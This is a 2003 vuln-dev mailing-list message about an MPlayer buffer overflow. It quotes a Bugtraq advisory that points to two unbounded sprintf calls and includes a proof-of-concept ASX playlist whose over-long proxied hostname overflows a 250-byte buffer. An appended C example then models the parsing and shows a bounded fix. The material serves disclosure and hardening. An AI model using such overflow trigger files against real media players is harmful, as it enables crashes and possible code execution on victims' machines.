MPlayer buffer overflow
From: Peter Geissler (blasty_at_geekz.nl)
Date: 09/29/03
- Previous message: Lorenzo Hernandez Garcia-Hierro: "Possible Apache directory rules bypass / override"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 29 Sep 2003 21:47:44 +0200
To: vuln-dev@securityfocus.com
In-Reply-To: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8@USPLM250.txpln.us.eds.com>
>
> I tried to exploit this bug, but I didn't succeed.
> The only thing that happens is that mplayer crashes, so I hooked it up with GDB and saw it crashed in strcasecmp with EIP 0x40315fe0 and not something like 0x41414141 ;)
> In the PoC exploit on bugtraq the "aaaa..." buffer is not correctly formatted (the newlines must be removed so it's one long string), but I already fixed that.
> Does anyone have an idea what I'm doing wrong?
>> >Message-ID: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8@USPLM250.txpln.us.eds.com>
>> >From: "Otero, Hernan" <hernan.otero@eds.com>
>> >To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
>> >Subject: Mplayer Buffer Overflow
>> >Date: Thu, 25 Sep 2003 19:17:49 -0500
>> >
>> >
>> >Favorite Linux Player Buffer Overflow
>> >
>> >
>> > Product: Mplayer
>> > Developers: http://www.mplayerhq.hu
>> > OS: Port to All *NIX and Win32
>> > Remote Exploitable: YES
>> >
>> >Developers have been contacted, the problem was fixed; updating your
>> >mplayer version is recommended.
>> >
>> > In the source tree there is a file called asf_streaming.c. This file
>> >has a function named asf_http_request; that function has two buffer
>> >overflows, and these overflows are in the sprintf lines.
>> >
>> >
>> > asf_http_request {
>> >     char str[250];
>> >     ....
>> >     /* first overflow: the hostname is written with no bound against the 250-byte str */
>> >     sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
>> >     ....
>> >     /* second overflow: the same unbounded sprintf with the target URL's hostname */
>> >     sprintf( str, "Host: %s:%d", url->hostname, url->port );
>> >     ....
>> > }
>> >
>> >
>> >
>> > This, at first look, may look as if it can't be exploited (because of
>> >the MAXHOSTLEN size restriction)... but with an ASX file like this, with a
>> >"badsite" listening on "badport" that sends "\n\n" as the answer, you can
>> >get a fully controllable EIP buffer overflow:
>> >
>> >
>> > <asx version = "3.0">
>> > <title>Bad Site ASX</title>
>> >
>> > <moreinfo href = "mailto:info@badsite.com" />
>> > <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
>> > <banner href= "images/bannermitre.gif">
>> > <abstract>Bad Site live</abstract>
>> > <moreinfo target="_blank" href = "http://www.badsite.com/" />
>> > </banner>
>> >
>> > <entry>
>> > <title>NEWS</title>
>> > <AUTHOR>NEWS</AUTHOR>
>> > <COPYRIGHT>© All by the news</COPYRIGHT>
>> > <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"/>
>> > <logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
>> > </entry>
>> > </asx>
>> >
>> >
>> >
>> > Regards,
>> >
>> > Hernán Otero
>> > hernan.otero@eds.com
>
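As an added example, not code from MPlayer or from either poster, here is a small C model of the header construction the advisory describes: a URL parser that puts no cap on hostname length, the http_proxy://proxy:port/http://inner... shape from the ASX's <ref href>, and the sprintf replaced by a bounded snprintf with a truncation check. `simple_url`, `parse_authority`, `inner_host_from_proxy_url`, `make_proxy_url` and `proxy_demo` are hypothetical names; the parsing is a simplified stand-in for MPlayer's own URL code, not a copy of it, and the default ports (8080 for the proxy, 80 for the inner URL) and the sample URL are assumptions. `proxy_demo` reports how many bytes the original unbounded sprintf would have written, so the overflow is shown arithmetically rather than triggered.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical parsed-URL record standing in for MPlayer's URL_t (not its definition). */
struct simple_url {
    char *hostname;    /* heap copy with no length cap: the attacker picks its size */
    int port;
    const char *path;  /* points into the input at the first '/' after host[:port] */
};

/* Parse "host[:port][/rest]", the part after "scheme://". Returns 0 or -1. */
static int parse_authority(const char *p, int default_port, struct simple_url *out)
{
    size_t host_len = strcspn(p, ":/");
    if (host_len == 0 || !(out->hostname = malloc(host_len + 1)))
        return -1;
    memcpy(out->hostname, p, host_len);
    out->hostname[host_len] = '\0';
    p += host_len;
    out->port = default_port;
    if (*p == ':') {
        char *end;
        long v = strtol(p + 1, &end, 10);
        if (end == p + 1 || v < 1 || v > 65535 || (*end != '/' && *end != '\0')) {
            free(out->hostname);
            return -1;
        }
        out->port = (int)v;
        p = end;
    }
    out->path = p;
    return 0;
}

/* Hardened form of the advisory's sprintf( str, "Host: %s:%d", ... ): bounded write
 * plus a truncation check, so an over-long hostname is rejected (-1) instead of
 * overflowing str or being silently cut. */
static int build_host_header_safe(char *str, size_t str_size, const char *hostname, int port)
{
    int n = snprintf(str, str_size, "Host: %s:%d", hostname, port);
    if (n < 0 || (size_t)n >= str_size) {
        str[0] = '\0';
        return -1;
    }
    return n;
}

/* The advisory's shape: http_proxy://proxy:port/http://inner..., with the Host
 * header built from the *inner* hostname. Returns a heap copy of it, or NULL. */
static char *inner_host_from_proxy_url(const char *proxy_url, int *port)
{
    struct simple_url outer, inner;
    char *host = NULL;
    if (strncmp(proxy_url, "http_proxy://", 13) != 0 ||
        parse_authority(proxy_url + 13, 8080, &outer) != 0)
        return NULL;
    if (strncmp(outer.path, "/http://", 8) == 0 &&
        parse_authority(outer.path + 8, 80, &inner) == 0) {
        host = inner.hostname;
        *port = inner.port;
    }
    free(outer.hostname);
    return host;
}

/* Constructed input (not from the post): an inner hostname of n 'a's behind a
 * proxy, shaped like the <ref href> in the advisory's ASX. Caller frees. */
static char *make_proxy_url(size_t n)
{
    const char *prefix = "http_proxy://badsite:8080/http://", *suffix = "/stream.asf";
    char *url = malloc(strlen(prefix) + n + strlen(suffix) + 1);
    if (!url)
        return NULL;
    memcpy(url, prefix, strlen(prefix));
    memset(url + strlen(prefix), 'a', n);
    strcpy(url + strlen(prefix) + n, suffix);
    return url;
}

/* Runs the hardened builder on an inner hostname of n 'a's and returns its result
 * (-1 = rejected); *would_write gets the byte count (without NUL) the original
 * unbounded sprintf would have put into the 250-byte str, via snprintf(NULL, 0, ...). */
int proxy_demo(size_t n, int *would_write)
{
    char str[250];  /* same size as the str[250] buffer the advisory quotes */
    int port = 0, rc = -1;
    char *url = make_proxy_url(n);
    char *host = url ? inner_host_from_proxy_url(url, &port) : NULL;
    *would_write = -1;
    if (host) {
        *would_write = snprintf(NULL, 0, "Host: %s:%d", host, port);
        rc = build_host_header_safe(str, sizeof str, host, port);
    }
    free(host);
    free(url);
    return rc;
}

int proxy_demo_result(size_t n)          { int w; return proxy_demo(n, &w); }
int proxy_demo_required_length(size_t n) { int w; proxy_demo(n, &w); return w; }
```

Compile with `cc -std=c99 -Wall` and call `proxy_demo(241, &w)`: 241 bytes of hostname plus "Host: " and ":80" is exactly 250 characters, which with the terminating NUL is one byte more than `str[250]` holds, so the hardened builder returns -1 at the same point where the original sprintf would have started writing past the buffer. With 240 a's it succeeds and returns 249; with the 400-odd a's of the ASX it is rejected while the unbounded write would have needed well over 400 bytes.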